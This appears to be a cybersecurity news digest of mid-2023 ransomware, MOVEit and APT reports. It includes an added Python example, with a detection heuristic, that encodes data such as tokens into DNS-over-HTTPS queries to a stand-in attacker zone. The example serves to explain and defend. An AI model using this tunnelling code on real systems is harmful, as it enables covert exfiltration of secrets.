Microsoft confirmed that the recent outages to the Azure, Outlook, and OneDrive services were caused by cyber attacks. In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing apps,...Security Affairs
June 18, 2023 – Criminals
Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit Full Text
Abstract
The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents,...Security Affairs
June 18, 2023 – Government
US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government. Full Text
Abstract
The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government. The US government is offering up to a $10 million bounty for information linking CL0P Ransomware Gang or any other threat...Security Affairs
June 18, 2023 – General
Security Affairs newsletter Round 424 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Law...Security Affairs
June 17, 2023 – Criminals
Law enforcement shutdown a long-standing DDoS-for-hire service Full Text
Abstract
Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013. An international operation codenamed PowerOFF led to the shutdown of a DDoS-for-hire service...Security Affairs
June 17, 2023 – Vulnerabilities
A simple bug exposed access to thousands of smart security alarm systems Full Text
Abstract
U.S. power and electronics giant Eaton has fixed a security vulnerability that allowed a security researcher to remotely access thousands of smart security alarm systems.Cyware
June 17, 2023 – Botnet
From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet Full Text
Abstract
Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot , revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit ," Cado Security said in a technical report. "In addition, artifacts from the group's campaigns contain messaging and imagery related to this organization." Diicot (née Mexals) was first documented by Bitdefender in July 2021, uncovering the actor's use of a Go-based SSH brute-forcer tool called Diicot Brute to breach Linux hosts as part of a cryptojacking campaign. Then earlier this April, Akamai disclosed what it described as a "resurgence" of the 2021 activity that's believed to have started around October 2022, netting the actor about $10,000 in illicit profits. "The attackers use a long chThe Hacker News
June 17, 2023 – Vulnerabilities
Third MOVEit bug fixed a day after PoC exploit made public Full Text
Abstract
Details of the latest vulnerability, tracked as CVE-2023-35708, were made public Thursday; a proof-of-concept (PoC) exploit for the flaw, now fixed today, also emerged on Thursday. Progress Software issued a fix for it on Friday.Cyware
June 16, 2023 – Policy and Law
Justice Department Charges Russian National for LockBit Ransomware Attacks Full Text
Abstract
The 20-year old allegedly participated in a conspiracy to commit wire fraud and intentionally damage protected computers and make ransom demands.Lawfare
June 16, 2023 – Criminals
A Russian national charged for committing LockBit Ransomware attacks Full Text
Abstract
DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous...Security Affairs
June 16, 2023 – Malware
ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC Full Text
Abstract
The threat actor known as ChamelGang has been observed using a previously undocumented implant to backdoor Linux systems, marking a new expansion of the threat actor's capabilities. The malware, dubbed ChamelDoH by Stairwell, is a C++-based tool for communicating via DNS-over-HTTPS ( DoH ) tunneling. ChamelGang was first outed by Russian cybersecurity firm Positive Technologies in September 2021, detailing its attacks on fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan. Attack chains mounted by the actor have leveraged vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application Platform to gain initial access and carry out data theft attacks using a passive backdoor called DoorMe. "This is a native IIS module that is registered as a filter through which HTTP requests and responses are processed," Positive Technologies said at the time. "Its principle of operation is unusual: the backThe Hacker News
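DoH tunneling, the C2 channel the ChamelDoH entry describes, works by hiding data in the query name of an ordinary DNS message and shipping that message inside an HTTPS request to a public resolver (RFC 8484), so the enterprise's own DNS servers never see the lookup. The block below is an added example, not Stairwell's code or the implant itself: it builds the RFC 1035 wire-format query, encodes a payload into base32 labels under a hypothetical attacker zone, wraps it as an RFC 8484 GET URL, recovers the payload on the receiving side, and then shows the detection heuristic a network defender can apply to query names seen in DoH or DNS logs. The zone, resolver URL, payload and thresholds are assumptions made for the example, and the "last two labels are the registered domain" rule is a simplification.

```python
import base64
import math
import struct
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Hypothetical attacker-controlled zone and DoH resolver; both are assumptions for the example.
TUNNEL_ZONE = "c2.example"
DOH_ENDPOINT = "https://doh.example/dns-query"


def build_dns_query(qname: str, qtype: int = 16) -> bytes:
    """Minimal DNS query in RFC 1035 wire format (qtype 16 = TXT).
    ID 0 as RFC 8484 recommends for cache-friendly DoH GET requests."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)   # RD set, one question
    question = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in qname.split("."))
    return header + question + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_qname(msg: bytes) -> str:
    """Read the first question name back out of a DNS message (no compression in a query)."""
    labels, pos = [], 12
    while msg[pos]:
        n = msg[pos]
        labels.append(msg[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)


def tunnel_url(payload: bytes, seq: int) -> str:
    """Implant side: hide the payload in the query name of an RFC 8484 GET request."""
    b32 = base64.b32encode(payload).decode("ascii").rstrip("=").lower()  # DNS names are case-insensitive
    labels = [b32[i:i + 63] for i in range(0, len(b32), 63)]             # a label holds at most 63 bytes
    qname = ".".join([f"s{seq}", *labels, TUNNEL_ZONE])
    if len(qname) > 253:
        raise ValueError("payload too large for one query name; split it across queries")
    wire = base64.urlsafe_b64encode(build_dns_query(qname)).decode("ascii").rstrip("=")
    return f"{DOH_ENDPOINT}?dns={wire}"


def qname_from_url(url: str) -> str:
    """Inspection side: recover the query name from the ?dns= parameter of a DoH GET."""
    dns = parse_qs(urlparse(url).query)["dns"][0]
    return parse_qname(base64.urlsafe_b64decode(dns + "=" * (-len(dns) % 4)))


def recover_payload(qname: str) -> bytes:
    """Attacker's authoritative server: drop the sequence label and zone, base32-decode the rest."""
    labels = qname.split(".")[1:-len(TUNNEL_ZONE.split("."))]
    b32 = "".join(labels).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def looks_like_tunnel(qname: str) -> bool:
    """Defender heuristic: unusually long or high-entropy subdomain below the registered
    domain. Treating the last two labels as the registered domain is a simplification."""
    sub = "".join(qname.lower().split(".")[:-2])
    return len(sub) >= 40 or (len(sub) >= 24 and shannon_entropy(sub) >= 4.0)


if __name__ == "__main__":
    url = tunnel_url(b"user=alice;host=ws01;token=4f9c2e7d1b8a", 0)   # constructed beacon data
    name = qname_from_url(url)
    print(url)
    print(name, "->", recover_payload(name), "| tunnel?", looks_like_tunnel(name))
    print("www.example.com | tunnel?", looks_like_tunnel("www.example.com"))
```

The detection half only works where query names are visible: either the endpoint resolves through an inspected proxy or EDR logs the DNS calls, or the organisation blocks unsanctioned DoH resolvers so that the traffic falls back to the monitored path. Name-based heuristics also need an allowlist for legitimate long-label users such as CDN and anti-spam lookups.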
June 16, 2023 – Attack
Oil and gas giant Shell is another victim of Clop ransomware attacks Full Text
Abstract
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign...Security Affairs
June 16, 2023 – Malware
Balada Injector Campaign Hacks WordPress Sites Using Unpatched Plugins Full Text
Abstract
Balada leverages functions written in the Go language to spread itself and maintain persistence by executing a series of attacks, cross-site infections, and installation of backdoors.Cyware
June 16, 2023 – Education
Activities in the Cybercrime Underground Require a New Approach to Cybersecurity Full Text
Abstract
As Threat Actors Continuously Adapt their TTPs in Today's Threat Landscape, So Must You Earlier this year, threat researchers at Cybersixgill released the annual report, The State of the Cybercrime Underground . The research stems from an analysis of Cybersixgill's collected intelligence items throughout 2022, gathered from the deep, dark and clear web. The report examines the continuous evolution of threat actors' tactics, tools, and procedures (TTPs) in the Digital Age – and how organizations can adapt to reduce risk and maintain business resilience. This article summarizes a few of the report's findings, including trends in credit card fraud, observations about cryptocurrency, AI developments and how they're lowering barriers to entry to cybercrime, and the rise of cybercriminal "as-a-service" activities. Further below, I also discuss the need for a new security approach, combining attack surface management (ASM) and cyber threat intelligence (CTI) toThe Hacker News
June 16, 2023 – Vulnerabilities
Progress fixed a third flaw in MOVEit Transfer software Full Text
Abstract
Progress Software addressed a third vulnerability impacting its MOVEit Transfer application that could lead to privilege escalation and information disclosure. Progress Software disclosed a new SQL injection vulnerability impacting its MOVEit Transfer...Security Affairs
June 16, 2023 – Breach
Two Energy Department Entities Breached as Part of Massive MOVEit Transfer Compromise Full Text
Abstract
Multiple federal agencies, including two Department of Energy entities, were victims of a cyberattack that resulted from a widespread vulnerability in MOVEit file transfer software, federal officials said Thursday.Cyware
June 16, 2023 – Criminals
20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona Full Text
Abstract
The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last month. "Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware," the DoJ said . Astamirov, as part of his LockBit-related activities, managed various email addresses, IP addresses, and other online accounts to deploy the ransomware and communicate with the victims. Law enforcement agencies said they were able to trace a chunk of an unnamed victim's ransom payment to a virtual currency address operated by AstamThe Hacker News
June 16, 2023 – Malware
Updated Android spyware GravityRAT steals WhatsApp Backups Full Text
Abstract
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files. ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files....Security Affairs
June 16, 2023 – Hacker
New Diicot Threat Group Targets SSH Servers with Brute-Force Malware Full Text
Abstract
Deploying Cayosin botnet, an off-the-shelf Mirai-based botnet agent to target routers running the Linux-based OS OpenWrt is a newly adopted tactic, indicating that the group changes its attack style after examining its targets.Cyware
June 16, 2023 – Vulnerabilities
Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack Full Text
Abstract
Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies. The new flaw , which is being tracked as CVE-2023-35708 , also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment." The company is urging its customers to disable all HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443 to safeguard their environments while a fix is being prepared to address the weakness. The cloud managed file transfer solution has been fully patched. The revelation comes a week after Progress divulged another set of SQL injection vulnerabilities ( CVE-2023-35036 ) that it said could be weaponized to access the application's database content. The vulnerabilities join CVE-2023-34362 , which was exploited as a zero-day by the Clop ransomware gang in data theft attacksThe Hacker News
More
August 31, 2023
APT Attacks From ‘Earth Estries’ Hit Governments, Tech Firms Across the Globe Full Text
Abstract
Earth Estries uses advanced techniques such as DLL sideloading and has developed three custom malware tools: Zingdoor, TrillClient, and HemiGate. It has been active since at least 2020 and has similarities with another group called FamousSparrow.Cyware
August 25, 2023
China-linked Flax Typhoon APT targets Taiwan Full Text
Abstract
China-linked APT group Flax Typhoon targeted dozens of organizations in Taiwan as part of a suspected espionage campaign. Microsoft linked the Chinese APT Flax Typhoon (aka Ethereal Panda) to a cyber espionage campaign that targeted dozens of organizations...Security Affairs
August 24, 2023
nao-sec.org Full Text
Abstract
The APT group starts by sending a spear-phishing email, which consists of a DOC file embedded with a URL for a ZIP file download. Once the ZIP file gets downloaded, it contains an EXE file and a DLL file which are executed to infect malware.Cyware
August 23, 2023
Carderbee APT targets Hong Kong orgs via supply chain attacks Full Text
Abstract
A previously unknown APT group, tracked as Carderbee, was behind a supply chain attack against Hong Kong organizations. Symantec Threat Hunter Team reported that a previously unknown APT group, tracked as Carderbee, used a malware-laced version of the legitimate...Security Affairs
August 23, 2023
Supply Chain Attack: Carderbee APT Strikes Hong Kong Organizations Full Text
Abstract
Undocumented threat cluster Carderbee was observed targeting organizations in Hong Kong and other Asian regions via a trojanized version of the legitimate software EsafeNet Cobra DocGuard Client to deliver the PlugX backdoor and gain access to victim networks. Strengthening supply chain security th ... Cyware
August 22, 2023
Carderbee APT Uses Legitimate Software in Supply Chain Attack Targeting Hong Kong Firms Full Text
Abstract
The group appears to be skilled and patient, selectively pushing payloads to specific victims. The use of signed malware and supply chain attacks makes it difficult for security software to detect. Cyware
August 20, 2023
N. Korean Kimsuky APT targets S. Korea-US military exercises Full Text
Abstract
North Korea-linked APT Kimsuky launched a spear-phishing campaign targeting US contractors working at the war simulation centre. North Korea-linked APT group Kimsuky carried out a spear-phishing campaign against US contractors involved in a joint...Security Affairs
August 18, 2023
Bronze Starlight targets the Southeast Asian gambling sector Full Text
Abstract
Experts warn of an ongoing campaign attributed to China-linked Bronze Starlight that is targeting the Southeast Asian gambling sector. SentinelOne observed China-linked APT group Bronze Starlight (aka APT10, Emperor Dragonfly or Storm-0401) targeting...Security Affairs
August 17, 2023
APT29 is targeting Ministries of Foreign Affairs of NATO-aligned countries Full Text
Abstract
Russia-linked APT29 used the Zulip Chat App in attacks aimed at ministries of foreign affairs of NATO-aligned countries. EclecticIQ researchers uncovered an ongoing spear-phishing campaign conducted by Russia-linked threat actors targeting Ministries...Security Affairs
August 11, 2023
Researchers Shed Light on APT31’s Advanced Backdoors and Data Exfiltration Tactics Full Text
Abstract
The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe in 2022. "The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems," Kaspersky said in an analysis spotlighting APT31's previously undocumented tradecraft. The intrusions employ a three-stage malware stack, each focused on disparate aspects of the attack chain: setting up persistence, gathering sensitive data, and transmitting the information to a remote server under the threat actor's control. Some variants of the second-stage backdoors also come with features designed to look up file names in the Microso ... The Hacker News
August 11, 2023
Charming Kitten APT is targeting Iranian dissidents in Germany Full Text
Abstract
Germany’s Federal Office for the Protection of the Constitution (BfV) warns that the Charming Kitten APT group targeted Iranian dissidents in the country. The Federal Office for the Protection of the Constitution (BfV) is warning that an alleged...Security Affairs
August 6, 2023
BlueCharlie changes attack infrastructure in response to reports on its activity Full Text
Abstract
Russia-linked APT group BlueCharlie was observed changing its infrastructure in response to recent reports on its activity. Researchers from Recorded Future reported that Russia-linked APT group BlueCharlie (aka Blue Callisto, Callisto, COLDRIVER,...Security Affairs
August 3, 2023
Russian APT29 conducts phishing attacks through Microsoft Teams Full Text
Abstract
Russia-linked APT29 group targeted dozens of organizations and government agencies worldwide with Microsoft Teams phishing attacks. Microsoft Threat Intelligence reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium,...Security Affairs
August 02, 2023
Norwegian Entities Targeted in Ongoing Attacks Exploiting Ivanti EPMM Vulnerability Full Text
Abstract
Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network. The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) Tuesday. The exact identity or origin of the threat actor remains unclear. "The APT actors have exploited CVE-2023-35078 since at least April 2023," the authorities said. "The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy to target infrastructure." CVE-2023-35078 refers to a severe flaw that allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. It can be chained with a second vulne ... The Hacker News
August 01, 2023
China’s APT31 Suspected in Attacks on Air-Gapped Systems in Eastern Europe Full Text
Abstract
A nation-state actor with links to China is suspected of being behind a series of attacks against industrial organizations in Eastern Europe that took place last year to siphon data stored on air-gapped systems. Cybersecurity company Kaspersky attributed the intrusions with medium to high confidence to a hacking crew called APT31, which is also tracked under the monikers Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium), citing commonalities in the tactics observed. The attacks entailed the use of more than 15 distinct implants and their variants, broken down into three broad categories based on their ability to establish persistent remote access, gather sensitive information, and transmit the collected data to actor-controlled infrastructure. "One of the implant types appeared to be a sophisticated modular malware, aimed at profiling removable drives and contaminating them with a worm to exfiltrate data from isolated, or air-gapped, networks of indus ... The Hacker News
July 28, 2023
Russian APT BlueBravo targets diplomatic entities with GraphicalProton backdoor Full Text
Abstract
Russia-linked BlueBravo has been spotted targeting diplomatic entities in Eastern Europe with the GraphicalProton Backdoor. The Russia-linked state-sponsored threat actor BlueBravo (aka APT29, Cloaked Ursa, Midnight Blizzard, and Nobelium) has been observed...Security Affairs
July 25, 2023
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder Full Text
Abstract
North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address. Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already being monitored as Jade Sleet and TraderTraitor, a group with a history of striking blockchain and cryptocurrency sectors. UNC4899 also overlaps with APT43, another hacking crew associated with the Democratic People's Republic of Korea (DPRK) that was unmasked earlier this March as conducting a series of campaigns to gather intelligence and siphon cryptocurrency from targeted companies. The adversarial collective's modus operandi is characterized by the use of Operational Relay Boxes (ORBs) using L2TP IPsec tunnels along with commercial VPN providers to disguise the attacker's ... The Hacker News
July 25, 2023
Chinese Cyberespionage Group APT31 Targets Eastern European Entities Full Text
Abstract
A China-linked group APT31 (aka Zirconium) has been linked to a cyberespionage campaign targeting industrial organizations in Eastern Europe. The attackers abused DLL hijacking vulnerabilities in cloud-based data storage systems such as Dropbox or Yandex, as well as a temporary file-sharing serv ... Cyware
July 24, 2023
Lazarus Targets Windows IIS Web Servers for Malware Distribution Full Text
Abstract
ASEC discovered that the North Korean state-sponsored Lazarus APT group is attacking Windows Internet Information Service (IIS) web servers and using them to distribute malware. It is imperative for organizations to adopt stringent measures, including attack surface management, to identify expo ... Cyware
July 20, 2023
Experts attribute WyrmSpy and DragonEgg spyware to the Chinese APT41 group Full Text
Abstract
China-linked group APT41 was spotted using two previously undocumented Android spyware called WyrmSpy and DragonEgg. China-linked APT group APT41 has been observed using two previously undocumented Android spyware called WyrmSpy and DragonEgg. The...Security Affairs
July 19, 2023
Chinese APT41 Hackers Target Mobile Devices with New WyrmSpy and DragonEgg Spyware Full Text
Abstract
The prolific China-linked nation-state actor known as APT41 has been linked to two previously undocumented strains of Android spyware called WyrmSpy and DragonEgg. "Known for its exploitation of web-facing applications and infiltration of traditional endpoint devices, an established threat actor like APT 41 including mobile in its arsenal of malware shows how mobile endpoints are high-value targets with coveted corporate and personal data," Lookout said in a report shared with The Hacker News. APT41, also tracked under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti, is known to be operational since at least 2007, targeting a wide range of industries to conduct intellectual property theft. Recent attacks mounted by the adversarial collective have leveraged an open-source red teaming tool known as Google Command and Control (GC2) as part of attacks aimed at media and job platforms in Taiwan and Italy. The init ... The Hacker News
July 18, 2023
Gamaredon APT Steals Data Within an Hour Full Text
Abstract
Once again, the Gamaredon APT is carrying out a new wave of phishing attacks targeting Ukrainian government agencies, stealing data within an hour of the attack. The campaign is aimed at entities in Ukraine, including security services, military, and government organizations. It is advised tha ... Cyware
July 15, 2023
Russia-linked APT Gamaredon starts stealing data from victims between 30 and 50 minutes after the initial compromise Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT-UA) states that Russia-linked APT Gamaredon starts stealing data 30 minutes after the initial compromise. Ukraine's Computer Emergency Response Team (CERT-UA) is warning that the Russia-linked APT group...Security Affairs
July 09, 2023
Charming Kitten hackers use new ‘NokNok’ malware for macOS Full Text
Abstract
Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems.BleepingComputer
July 8, 2023
Iran-linked APT TA453 targets Windows and macOS systems Full Text
Abstract
Iran-linked APT group tracked TA453 has been linked to a new malware campaign targeting both Windows and macOS systems. The Iran-linked threat actor TA453 has been linked to a malware campaign that targets both Windows and macOS. TA453 is a nation-state...Security Affairs
July 3, 2023
SmugX: Chinese APT uses HTML smuggling to target European Ministries and embassies Full Text
Abstract
China-linked APT group was spotted using HTML smuggling in attacks aimed at Foreign Affairs ministries and embassies in Europe. A China-linked APT group was observed using HTML smuggling in attacks against Foreign Affairs ministries and embassies...Security Affairs
June 30, 2023
Iran-linked Charming Kitten APT enhanced its POWERSTAR Backdoor Full Text
Abstract
Iran-linked Charming Kitten group used an updated version of the PowerShell backdoor called POWERSTAR in a spear-phishing campaign. Security firm Volexity observed the Iran-linked Charming Kitten (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
June 30, 2023
North Korea-linked Andariel APT used a new malware named EarlyRat last year Full Text
Abstract
North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in...Security Affairs
June 26, 2023
China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks Full Text
Abstract
China-linked APT group VANGUARD PANDA, aka Volt Typhoon, was spotted using a novel tradecraft to gain initial access to target networks. CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel...Security Affairs
June 21, 2023
Russia-linked APT28 hacked Roundcube email servers of Ukrainian entities Full Text
Abstract
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations. A joint investigation conducted by Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked...Security Affairs
June 15, 2023
Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway Full Text
Abstract
A suspected China-nexus threat actor dubbed UNC4841 has been linked to the exploitation of a recently patched zero-day flaw in Barracuda Email Security Gateway (ESG) appliances since October 2022. "UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People's Republic of China," Google-owned Mandiant said in a new report published today, describing the group as "aggressive and skilled." The flaw in question is CVE-2023-2868 (CVSS score: 9.8), which relates to a remote code injection affecting versions 5.1.3.001 through 9.2.0.006 that arises as a result of an incomplete validation of attachments contained within incoming emails. Barracuda addressed the problem on May 20 and 21, 2023, but the company has since urged affected customers to immediately replace the devices "regardless of patch version level." Now according to the incident response and threat intelligence firm, which was appointed to probe the hack, UNC4 ... The Hacker News
June 15, 2023
Russia-linked APT Gamaredon updates TTPs in recent attacks against Ukraine Full Text
Abstract
Russia-linked APT group Gamaredon is using a new toolset in attacks aimed at critical organizations in Ukraine. The Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa)...Security Affairs
June 14, 2023
Microsoft links Cadet Blizzard APT to Russia’s military intelligence GRU Full Text
Abstract
Microsoft linked a series of wiping attacks to a Russia-linked APT group, tracked as Cadet Blizzard, that is under the control of the GRU. Microsoft attributes the operations carried out by the Russia-linked APT group tracked as Cadet Blizzard to the Russian...Security Affairs
June 14, 2023
China-linked APT UNC3886 used VMware ESXi Zero-Day Full Text
Abstract
A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability. Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked...Security Affairs
June 8, 2023
Experts detail a new Kimsuky social engineering campaign Full Text
Abstract
North Korea-linked APT Kimsuky has been linked to a social engineering campaign aimed at experts in North Korean affairs. SentinelLabs researchers uncovered a social engineering campaign by the North Korea-linked APT group Kimsuky that is targeting...Security Affairs
June 3, 2023
Kimsuky APT poses as journalists and broadcast writers in its attacks Full Text
Abstract
North Korea-linked APT group Kimsuky is posing as journalists to gather intelligence, a joint advisory from NSA and FBI warns. A joint advisory from the FBI, the U.S. Department of State, the National Security Agency (NSA), South Korea’s National...Security Affairs
June 02, 2023
North Korea’s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks Full Text
Abstract
U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors' use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima. "North Korea relies heavily on intelligence gained from these spear-phishing campaigns," the agencies said. "Successful compromises of the targeted individuals enable Kimsuky actors to craft more credible and effective spear-phishing emails that can be leveraged against sensitive, high-value targets." Kimsuky refers to an ancillary element within North Korea's Reconnaissance General Bureau (RGB) and is known to collect tactical intelligence on geopolitical events and negotiations affecting the regi ... The Hacker News
June 1, 2023
Operation Triangulation: previously undetected malware targets iOS devices Full Text
Abstract
A previously undocumented APT group targets iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. Researchers from the Russian firm Kaspersky have uncovered a previously unknown APT group that is targeting...Security Affairs
May 31, 2023
Dark Pink APT Group Leverages TelePowerBot and KamiKakaBot in Sophisticated Attacks Full Text
Abstract
The threat actor known as Dark Pink has been linked to five new attacks aimed at various entities in Belgium, Brunei, Indonesia, Thailand, and Vietnam between February 2022 and April 2023. This includes educational institutions, government agencies, military bodies, and non-profit organizations, indicating the adversarial crew's continued focus on high-value targets. Dark Pink, also called Saaiwc Group, is an advanced persistent threat (APT) actor believed to be of Asia-Pacific origin, with attacks targeting entities primarily located in East Asia and, to a lesser extent, in Europe. The group employs a set of custom malware tools such as TelePowerBot and KamiKakaBot that provide various functions to exfiltrate sensitive data from compromised hosts. "The group uses a range of sophisticated custom tools, deploys multiple kill chains relying on spear-phishing emails," Group-IB security researcher Andrey Polovinkin said in a technical report shared with The Hacker News. "Onc ... The Hacker News
May 26, 2023
New PowerExchange Backdoor linked to an Iranian APT group Full Text
Abstract
An alleged Iran-linked APT group targeted an organization linked to the United Arab Emirates (U.A.E.) with the new PowerExchange backdoor. Researchers from the Fortinet FortiGuard Labs observed an attack targeting a government entity in the United...Security Affairs
May 25, 2023
China-linked APT Volt Typhoon targets critical infrastructure organizations Full Text
Abstract
A China-linked APT group, tracked as Volt Typhoon, breached critical infrastructure organizations in the U.S. and Guam without being detected. China-linked APT cyber espionage group Volt Typhoon infiltrated critical infrastructure organizations in the U.S....Security Affairs
May 25, 2023
North Korea-linked Lazarus APT targets Microsoft IIS servers to deploy malware Full Text
Abstract
North Korea-linked APT group Lazarus has been targeting vulnerable Microsoft IIS servers to deploy malware. AhnLab Security Emergency response Center (ASEC) researchers reported that the Lazarus APT Group is targeting vulnerable versions of Microsoft...Security Affairs
May 25, 2023
Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites Full Text
Abstract
Iran-linked threat actor Tortoiseshell targeted shipping, logistics, and financial services companies in Israel with watering hole attacks. ClearSky Cyber Security uncovered a watering hole attack on at least eight Israeli websites belonging to shipping,...Security Affairs
May 23, 2023
GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments Full Text
Abstract
Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal. Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy. The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance. GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation. What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored g ... The Hacker News
May 23, 2023
The previously undocumented GoldenJackal APT targets Middle East, South Asia entities Full Text
Abstract
A previously undocumented APT group tracked as GoldenJackal has been targeting government and diplomatic entities in the Middle East and South Asia since 2019. Kaspersky researchers shared details about the activity of a previously undocumented APT group,...Security Affairs
May 23, 2023
North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware Full Text
Abstract
The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation. "Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report published today. The ongoing targeted campaign, per the cybersecurity firm, is primarily geared towards information services as well as organizations supporting human rights activists and North Korean defectors. Kimsuky, active since 2012, has exhibited targeting patterns that align with North Korea's operational mandates and priorities. The intelligence collection missions have involved the use of a diverse set of malware, including another reconnaissance program called ReconShark, as detailed by SentinelOne earlier this month. The latest activity ... The Hacker News
May 23, 2023
A deeper insight into the CloudWizard APT’s activity revealed a long-running activity Full Text
Abstract
Experts warn of a threat actor, tracked as CloudWizard APT, that is targeting organizations involved in the region of the Russo-Ukrainian conflict. In March 2023, researchers from Kaspersky spotted a previously unknown APT group, tracked as Bad...Security Affairs
May 20, 2023
